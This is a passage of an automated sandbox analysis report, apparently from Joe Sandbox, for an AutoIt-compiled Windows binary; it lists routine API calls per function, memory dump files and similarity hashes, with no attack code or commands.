                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 44706859-0
                                • Opcode ID: c99658d3953481b29fd86d84f527a0d77d64a935181c842e6f3f25708c491e39
                                • Instruction ID: 381441699b03a0974efc73c85e9c98c0b426beadeb2324d723db46977c7d5119
                                • Opcode Fuzzy Hash: c99658d3953481b29fd86d84f527a0d77d64a935181c842e6f3f25708c491e39
                                • Instruction Fuzzy Hash: C8F04971200209AFEB211FA5EC88E7B3BBCEF89B55B100039FA49D7150CF759942EA60
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00AFC6BA
                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00AFC6D1
                                • MessageBeep.USER32(00000000), ref: 00AFC6E9
                                • KillTimer.USER32(?,0000040A), ref: 00AFC705
                                • EndDialog.USER32(?,00000001), ref: 00AFC71F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                • String ID:
                                • API String ID: 3741023627-0
                                • Opcode ID: 868d33d6da3ddc771c43d56ecc68f6d212f0da15185517b94575e1f134ce48d9
                                • Instruction ID: 9436174cffa31b7a9193193f0ac23d98bcc2ec8abd3583128526c1c3cf0ecb94
                                • Opcode Fuzzy Hash: 868d33d6da3ddc771c43d56ecc68f6d212f0da15185517b94575e1f134ce48d9
                                • Instruction Fuzzy Hash: F9014F3050470DABEB316B61DE4EFB677B8FB04715F000669B642A24E1EBE4A959CE80
                                APIs
                                • EndPath.GDI32(?), ref: 00AA13BF
                                • StrokeAndFillPath.GDI32(?,?,00ADBAD8,00000000,?), ref: 00AA13DB
                                • SelectObject.GDI32(?,00000000), ref: 00AA13EE
                                • DeleteObject.GDI32 ref: 00AA1401
                                • StrokePath.GDI32(?), ref: 00AA141C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                • String ID:
                                • API String ID: 2625713937-0
                                • Opcode ID: b0649c6eda0bc623cd534db51b0ebccfcb87cf965a20ad2dd504d361e5f7c3db
                                • Instruction ID: 92e0a6c5c9972784571f0d742c5a989c7229478e201495089966f16a61d0b4a3
                                • Opcode Fuzzy Hash: b0649c6eda0bc623cd534db51b0ebccfcb87cf965a20ad2dd504d361e5f7c3db
                                • Instruction Fuzzy Hash: 01F0EC70004309EBDB255F2AED0CB693FB5A752326F04C236E4298B0F1CB794996DF60
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 00B0C69D
                                • CoCreateInstance.OLE32(00B32D6C,00000000,00000001,00B32BDC,?), ref: 00B0C6B5
                                  • Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82
                                • CoUninitialize.OLE32 ref: 00B0C922
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                • String ID: .lnk
                                • API String ID: 2683427295-24824748
                                • Opcode ID: cd0b44102b19da230387d3907b894efd1cc18ca37a7b70ca1fb0ef0ebd7798f9
                                • Instruction ID: 50f072ecc52a2296fac862d3aa88749ace4250f458bec19d616a4d861b3e7c98
                                • Opcode Fuzzy Hash: cd0b44102b19da230387d3907b894efd1cc18ca37a7b70ca1fb0ef0ebd7798f9
                                • Instruction Fuzzy Hash: 40A12C71204205AFD700EF64C981EAFB7E8EF85744F00496DF1569B1E1EB71EA49CB62
                                APIs
                                  • Part of subcall function 00AC0FF6: std::exception::exception.LIBCMT ref: 00AC102C
                                  • Part of subcall function 00AC0FF6: __CxxThrowException@8.LIBCMT ref: 00AC1041
                                  • Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82
                                  • Part of subcall function 00AA7BB1: _memmove.LIBCMT ref: 00AA7C0B
                                • __swprintf.LIBCMT ref: 00AB302D
                                Strings
                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AB2EC6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                • API String ID: 1943609520-557222456
                                • Opcode ID: adc39d941f2e748372883b279cf1a5ec675a7f1077889072e9f80d40994ae8d4
                                • Instruction ID: 590b7f3b7cad386c272deadeaaf744f0e2b848a38f76284a28758e217d86df39
                                • Opcode Fuzzy Hash: adc39d941f2e748372883b279cf1a5ec675a7f1077889072e9f80d40994ae8d4
                                • Instruction Fuzzy Hash: 129181725083419FCB14EF24D985DAFB7B8EF95750F00495DF4429B2A2DB20EE44CB52
                                APIs
                                  • Part of subcall function 00AA48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA48A1,?,?,00AA37C0,?), ref: 00AA48CE
                                • CoInitialize.OLE32(00000000), ref: 00B0BC26
                                • CoCreateInstance.OLE32(00B32D6C,00000000,00000001,00B32BDC,?), ref: 00B0BC3F
                                • CoUninitialize.OLE32 ref: 00B0BC5C
                                  • Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
                                  • Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                • String ID: .lnk
                                • API String ID: 2126378814-24824748
                                • Opcode ID: c3acb9249c062637fb9c4cc8c1b831fe89115d5cdf440e22012ab43257626db6
                                • Instruction ID: e6fefa8e03aa418aa95a0b4e706152b9a5640d32cdedb3df23fe7542ea2d9e52
                                • Opcode Fuzzy Hash: c3acb9249c062637fb9c4cc8c1b831fe89115d5cdf440e22012ab43257626db6
                                • Instruction Fuzzy Hash: 27A12575604301AFCB14DF14C984E6ABBE5FF89314F148998F89A9B3A1CB32ED45CB91
                                APIs
                                • __startOneArgErrorHandling.LIBCMT ref: 00AC52DD
                                  • Part of subcall function 00AD0340: __87except.LIBCMT ref: 00AD037B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ErrorHandling__87except__start
                                • String ID: pow
                                • API String ID: 2905807303-2276729525
                                • Opcode ID: e3ec7591d30467265d743f06943adbbb68ad6e8d3904af16aa2917f61b85ac91
                                • Instruction ID: bdc0af25ad0ac79b99119a747a670529075f891cea7fc3923aad2e25ce2e568d
                                • Opcode Fuzzy Hash: e3ec7591d30467265d743f06943adbbb68ad6e8d3904af16aa2917f61b85ac91
                                • Instruction Fuzzy Hash: 935168B1E1DA0186C7116734CA11FAE3BE0DB00750F65895EF4D68A3E6EF74ACC49A46
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID: #$+
                                • API String ID: 0-2552117581
                                • Opcode ID: dd916aa15245503e9b5f9e64455425c1824d779b6afff442feb390f0d80c2289
                                • Instruction ID: e9c435ee3a7928ae39b11158823926cae3d2531dc28cbe66cf6eecaee04773cd
                                • Opcode Fuzzy Hash: dd916aa15245503e9b5f9e64455425c1824d779b6afff442feb390f0d80c2289
                                • Instruction Fuzzy Hash: 8B51127590664ADFCF25DFB8C888AFA7BB4EF16310F184059FA919B2A0D7349D42C760
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _memset$_memmove
                                • String ID: ERCP
                                • API String ID: 2532777613-1384759551
                                • Opcode ID: a742978ec75d099bd49eacee7ff64195583e45f9ff43edb53c48f25596ae5a05
                                • Instruction ID: 376e5829796afda4b8e8da70b8d59bb72e97a452d371aebc1534015648558b1f
                                • Opcode Fuzzy Hash: a742978ec75d099bd49eacee7ff64195583e45f9ff43edb53c48f25596ae5a05
                                • Instruction Fuzzy Hash: F1517171900709DFDB24CF65C981BEABBF8EF04714F20856EEA4ACB242E7759594CB44
                                APIs
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B2F910,00000000,?,?,?,?), ref: 00B27C4E
                                • GetWindowLongW.USER32 ref: 00B27C6B
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B27C7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$Long
                                • String ID: SysTreeView32
                                • API String ID: 847901565-1698111956
                                • Opcode ID: 30798c99969b17622f1df98567aaae1a3c363d83b8a4fad05d9b942fba804ec6
                                • Instruction ID: 62903103d6d37c8940e6e70391924d4d138579d5291f642ad5a7f366e02f104b
                                • Opcode Fuzzy Hash: 30798c99969b17622f1df98567aaae1a3c363d83b8a4fad05d9b942fba804ec6
                                • Instruction Fuzzy Hash: B431C131244216ABDB258F38EC45BEA77E9EF15324F204765F879A32E0CB31EC519B54
                                APIs
                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B276D0
                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B276E4
                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B27708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$Window
                                • String ID: SysMonthCal32
                                • API String ID: 2326795674-1439706946
                                • Opcode ID: 74266240615bccaf87c670e01df6ce331ee3e09836da1386e34f4d1ae2633e19
                                • Instruction ID: 8be563711eda331028273b4be0d62749908e5c77e4bcd64dc92b7c176b04c841
                                • Opcode Fuzzy Hash: 74266240615bccaf87c670e01df6ce331ee3e09836da1386e34f4d1ae2633e19
                                • Instruction Fuzzy Hash: 2521D332540229BBDF22CF54DC46FEA3BB9EF48714F110254FE196B1D0DAB1AC518BA0
                                APIs
                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B26FAA
                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B26FBA
                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B26FDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$MoveWindow
                                • String ID: Listbox
                                • API String ID: 3315199576-2633736733
                                • Opcode ID: 105f617e5f1873430f4f6c7532485a3630cc6890fd395abdefa6b9927c3e6428
                                • Instruction ID: 0fc04cf3707dffe96d1e4eca107e6a573efff1824d5f6ea2487dcfd09e616868
                                • Opcode Fuzzy Hash: 105f617e5f1873430f4f6c7532485a3630cc6890fd395abdefa6b9927c3e6428
                                • Instruction Fuzzy Hash: FF2165326111287FDF158F54EC85FBB37AAEF89754F118164F9189B190CA719C51CBA0
                                APIs
                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B279E1
                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B279F6
                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B27A03
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: msctls_trackbar32
                                • API String ID: 3850602802-1010561917
                                • Opcode ID: 386203027a2f915ffa1904d0f3049bd90f263fa7a079a0f2a578d0e59260182b
                                • Instruction ID: 26369b9385c80b07a9a963308ecdb62b1eafb3712c6e984bd36bad1ed7fadc50
                                • Opcode Fuzzy Hash: 386203027a2f915ffa1904d0f3049bd90f263fa7a079a0f2a578d0e59260182b
                                • Instruction Fuzzy Hash: D611E332294218BAEF209F74DC05FEB37A9EF89764F010529FA45A60D0DA719851CB64
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00AA4C2E), ref: 00AA4CA3
                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AA4CB5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetNativeSystemInfo$kernel32.dll
                                • API String ID: 2574300362-192647395
                                • Opcode ID: 317f758773bff1ccdabd149d9ae38a5a53cb630fb37be75f72991228568fc0f3
                                • Instruction ID: f15bb070690ea5746233afe372025476d36ba8588a4e06ecbb6ad2e5c8b76aac
                                • Opcode Fuzzy Hash: 317f758773bff1ccdabd149d9ae38a5a53cb630fb37be75f72991228568fc0f3
                                • Instruction Fuzzy Hash: 43D01230510723CFD7205F31DA5875676F5AF09B51B11887DA889D71A0DBB0D481C650
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00AA4CE1,?), ref: 00AA4DA2
                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AA4DB4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                • API String ID: 2574300362-1355242751
                                • Opcode ID: 047d128711cd5b12841dfd4deab44475ac1efb38dad920e838e616ae2087cc5f
                                • Instruction ID: c5795232a40d972cdabb5e010217a1ea247fc2b499af0523b872d19def116084
                                • Opcode Fuzzy Hash: 047d128711cd5b12841dfd4deab44475ac1efb38dad920e838e616ae2087cc5f
                                • Instruction Fuzzy Hash: 31D01231550713CFD7305F31D80875676E4AF09756B158879E8C6D71A0DBB0D481C650
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00AA4D2E,?,00AA4F4F,?,00B662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4D6F
                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AA4D81
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                • API String ID: 2574300362-3689287502
                                • Opcode ID: 79eb8fbd095a18b7b4a44688bf8f9fb780460254d27bbe9c17f48dfd04f2bfd4
                                • Instruction ID: 3b073be476f0e70d6a4712b07c2db7f6cdf9d3ba95c88ca08e42ff00f1b9184d
                                • Opcode Fuzzy Hash: 79eb8fbd095a18b7b4a44688bf8f9fb780460254d27bbe9c17f48dfd04f2bfd4
                                • Instruction Fuzzy Hash: 47D01230510713CFD7305F31D80876676E8AF19752B558879A486D72A0EBB0D480CA50
                                APIs
                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00B212C1), ref: 00B21080
                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B21092
                                Strings
                                Memory Dump Source
